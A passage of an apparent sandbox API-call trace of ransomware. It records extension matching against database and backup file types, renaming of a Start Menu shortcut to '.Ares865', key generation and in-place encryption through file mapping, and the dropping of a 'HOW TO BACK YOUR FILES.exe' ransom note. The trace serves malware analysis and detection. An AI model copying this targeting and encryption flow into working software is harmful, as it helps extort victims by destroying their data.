[0058.258] lstrlenW (lpString="ddl") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.258] lstrlenW (lpString="dlis") returned 4 [0058.258] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.258] lstrlenW (lpString="dp1") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.258] lstrlenW (lpString="dqy") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.258] lstrlenW (lpString="dsk") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.258] lstrlenW (lpString="dsn") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.258] lstrlenW (lpString="dtsx") returned 4 [0058.258] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.258] lstrlenW (lpString="dxl") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.258] lstrlenW (lpString="eco") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.258] lstrlenW (lpString="ecx") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.259] lstrlenW (lpString="edb") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.259] lstrlenW (lpString="epim") returned 4 [0058.259] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.259] lstrlenW (lpString="fcd") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.259] lstrlenW (lpString="fdb") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.259] lstrlenW (lpString="fic") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.259] lstrlenW (lpString="flexolibrary") returned 12 [0058.259] lstrcmpiW (lpString1="Explorer.lnk", lpString2="flexolibrary") returned -1 [0058.259] lstrlenW (lpString="fm5") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.259] lstrlenW (lpString="fmp") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.259] lstrlenW (lpString="fmp12") returned 5 [0058.259] lstrcmpiW (lpString1="r.lnk", lpString2="fmp12") returned 1 [0058.259] lstrlenW (lpString="fmpsl") returned 5 [0058.259] lstrcmpiW (lpString1="r.lnk", lpString2="fmpsl") returned 1 [0058.259] lstrlenW (lpString="fol") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.259] lstrlenW (lpString="fp3") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.259] lstrlenW (lpString="fp4") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.259] lstrlenW (lpString="fp5") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.259] lstrlenW (lpString="fp7") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.259] lstrlenW (lpString="fpt") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.259] lstrlenW (lpString="frm") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.259] lstrlenW (lpString="gdb") returned 3 [0058.259] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.259] lstrlenW (lpString="gdb") returned 3 [0058.260] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.260] lstrlenW (lpString="grdb") returned 4 [0058.260] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.260] lstrlenW (lpString="gwi") returned 3 [0058.260] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.260] lstrlenW (lpString="hdb") returned 3 [0058.260] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.260] lstrlenW (lpString="his") returned 3 [0058.260] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.260] lstrlenW (lpString="ib") returned 2 [0058.260] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.260] lstrlenW (lpString="idb") returned 3 [0058.260] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.260] lstrlenW (lpString="ihx") returned 3 [0058.260] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.260] lstrlenW (lpString="itdb") returned 4 [0058.260] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.260] lstrlenW (lpString="itw") returned 3 [0058.260] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.260] lstrlenW (lpString="jet") returned 3 [0058.260] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.260] lstrlenW (lpString="jtx") returned 3 [0058.260] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.260] lstrlenW (lpString="kdb") returned 3 [0058.260] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.260] lstrlenW (lpString="kexi") returned 4 [0058.260] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.260] lstrlenW (lpString="kexic") returned 5 [0058.260] lstrcmpiW (lpString1="r.lnk", lpString2="kexic") returned 1 [0058.260] lstrlenW (lpString="kexis") returned 5 [0058.260] lstrcmpiW (lpString1="r.lnk", lpString2="kexis") returned 1 [0058.261] lstrlenW (lpString="lgc") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.261] lstrlenW (lpString="lwx") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.261] lstrlenW (lpString="maf") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.261] lstrlenW (lpString="maq") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.261] lstrlenW (lpString="mar") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.261] lstrlenW (lpString="marshal") returned 7 [0058.261] lstrcmpiW (lpString1="rer.lnk", lpString2="marshal") returned 1 [0058.261] lstrlenW (lpString="mas") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.261] lstrlenW (lpString="mav") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.261] lstrlenW (lpString="maw") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.261] lstrlenW (lpString="mdbhtml") returned 7 [0058.261] lstrcmpiW (lpString1="rer.lnk", lpString2="mdbhtml") returned 1 [0058.261] lstrlenW (lpString="mdn") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.261] lstrlenW (lpString="mdt") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.261] lstrlenW (lpString="mfd") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.261] lstrlenW (lpString="mpd") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.261] lstrlenW (lpString="mrg") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.261] lstrlenW (lpString="mud") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.261] lstrlenW (lpString="mwb") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.261] lstrlenW (lpString="myd") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.261] lstrlenW (lpString="ndf") returned 3 [0058.261] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.262] lstrlenW (lpString="nnt") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.262] lstrlenW (lpString="nrmlib") returned 6 [0058.262] lstrcmpiW (lpString1="er.lnk", lpString2="nrmlib") returned -1 [0058.262] lstrlenW (lpString="ns2") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.262] lstrlenW (lpString="ns3") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.262] lstrlenW (lpString="ns4") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.262] lstrlenW (lpString="nsf") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.262] lstrlenW (lpString="nv") returned 2 [0058.262] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.262] lstrlenW (lpString="nv2") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.262] lstrlenW (lpString="nwdb") returned 4 [0058.262] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.262] lstrlenW (lpString="nyf") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.262] lstrlenW (lpString="odb") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.262] lstrlenW (lpString="odb") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.262] lstrlenW (lpString="oqy") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.262] lstrlenW (lpString="ora") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.262] lstrlenW (lpString="orx") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.262] lstrlenW (lpString="owc") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.262] lstrlenW (lpString="p96") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.262] lstrlenW (lpString="p97") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.262] lstrlenW (lpString="pan") returned 3 [0058.262] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.263] lstrlenW (lpString="pdb") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.263] lstrlenW (lpString="pdm") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.263] lstrlenW (lpString="pnz") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.263] lstrlenW (lpString="qry") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.263] lstrlenW (lpString="qvd") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.263] lstrlenW (lpString="rbf") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.263] lstrlenW (lpString="rctd") returned 4 [0058.263] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.263] lstrlenW (lpString="rod") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.263] lstrlenW (lpString="rodx") returned 4 [0058.263] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.263] lstrlenW (lpString="rpd") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.263] lstrlenW (lpString="rsd") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.263] lstrlenW (lpString="sas7bdat") returned 8 [0058.263] lstrcmpiW (lpString1="orer.lnk", lpString2="sas7bdat") returned -1 [0058.263] lstrlenW (lpString="sbf") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.263] lstrlenW (lpString="scx") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.263] lstrlenW (lpString="sdb") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.263] lstrlenW (lpString="sdc") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.263] lstrlenW (lpString="sdf") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.263] lstrlenW (lpString="sis") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.263] lstrlenW (lpString="spq") returned 3 [0058.263] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.264] lstrlenW (lpString="te") returned 2 [0058.264] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.264] lstrlenW (lpString="teacher") returned 7 [0058.264] lstrcmpiW (lpString1="rer.lnk", lpString2="teacher") returned -1 [0058.264] lstrlenW (lpString="tmd") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.264] lstrlenW (lpString="tps") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.264] lstrlenW (lpString="trc") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.264] lstrlenW (lpString="trc") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.264] lstrlenW (lpString="trm") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.264] lstrlenW (lpString="udb") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.264] lstrlenW (lpString="udl") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.264] lstrlenW (lpString="usr") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.264] lstrlenW (lpString="v12") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.264] lstrlenW (lpString="vis") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.264] lstrlenW (lpString="vpd") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.264] lstrlenW (lpString="vvv") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.264] lstrlenW (lpString="wdb") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.264] lstrlenW (lpString="wmdb") returned 4 [0058.264] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.264] lstrlenW (lpString="wrk") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.264] lstrlenW (lpString="xdb") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.264] lstrlenW (lpString="xld") returned 3 [0058.264] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.265] lstrlenW (lpString="xmlff") returned 5 [0058.265] lstrcmpiW (lpString1="r.lnk", lpString2="xmlff") returned -1 [0058.265] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.Ares865") returned 82 [0058.265] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\windows explorer.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\windows explorer.lnk.ares865"), dwFlags=0x1) returned 1 [0058.278] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Windows Explorer.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\windows explorer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.278] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1228) returned 1 [0058.278] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.279] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0058.279] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.279] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0058.279] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.279] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0058.280] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x120 [0058.281] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x190000 [0058.287] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.287] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.288] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.288] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.288] CloseHandle (hObject=0x120) returned 1 [0058.288] CloseHandle (hObject=0x15c) returned 1 [0058.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0058.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.290] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dc80587, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0058.290] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0058.290] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d23a8 [0058.290] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools" [0058.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0058.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0058.290] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools") returned 66 [0058.290] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools" | out: lpString1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools" [0058.290] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0058.290] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\system tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0058.291] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.291] GetLastError () returned 0x20 [0058.291] Sleep (dwMilliseconds=0xc8) [0058.479] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0058.479] GetLastError () returned 0x0 [0058.479] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0058.479] ReadFile (in: hFile=0x164, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0058.479] CloseHandle (hObject=0x164) returned 1 [0058.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0058.480] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0058.480] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d98300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d98300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0058.480] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.480] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.480] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.480] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d98300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d98300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.480] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.480] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0058.480] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.480] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.480] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ddd71ea, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0d0d6f, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="computer.lnk", cAlternateFileName="")) returned 1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2="aoldtz.exe") returned 1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2=".") returned 1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2="..") returned 1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2="windows") returned -1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2="bootmgr") returned 1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2="temp") returned -1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2="pagefile.sys") returned -1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2="boot") returned 1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2="ids.txt") returned -1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2="ntuser.dat") returned -1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2="perflogs") returned -1 [0058.480] lstrcmpiW (lpString1="computer.lnk", lpString2="MSBuild") returned -1 [0058.480] lstrlenW (lpString="computer.lnk") returned 12 [0058.480] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools\\*") returned 68 [0058.480] lstrcpyW (in: lpString1=0x2cce486, lpString2="computer.lnk" | out: lpString1="computer.lnk") returned="computer.lnk" [0058.480] lstrlenW (lpString="computer.lnk") returned 12 [0058.480] lstrlenW (lpString="Ares865") returned 7 [0058.480] lstrcmpiW (lpString1="ter.lnk", lpString2="Ares865") returned 1 [0058.480] lstrlenW (lpString=".dll") returned 4 [0058.481] lstrcmpiW (lpString1="computer.lnk", lpString2=".dll") returned 1 [0058.481] lstrlenW (lpString=".lnk") returned 4 [0058.481] lstrcmpiW (lpString1="computer.lnk", lpString2=".lnk") returned 1 [0058.481] lstrlenW (lpString=".ini") returned 4 [0058.481] lstrcmpiW (lpString1="computer.lnk", lpString2=".ini") returned 1 [0058.481] lstrlenW (lpString=".sys") returned 4 [0058.481] lstrcmpiW (lpString1="computer.lnk", lpString2=".sys") returned 1 [0058.481] lstrlenW (lpString="computer.lnk") returned 12 [0058.481] lstrlenW (lpString="bak") returned 3 [0058.481] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.481] lstrlenW (lpString="ba_") returned 3 [0058.481] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.481] lstrlenW (lpString="dbb") returned 3 [0058.481] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.481] lstrlenW (lpString="vmdk") returned 4 [0058.481] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.481] lstrlenW (lpString="rar") returned 3 [0058.481] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.481] lstrlenW (lpString="zip") returned 3 [0058.481] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.481] lstrlenW (lpString="tgz") returned 3 [0058.481] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.481] lstrlenW (lpString="vbox") returned 4 [0058.481] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.481] lstrlenW (lpString="vdi") returned 3 [0058.481] lstrcmpiW 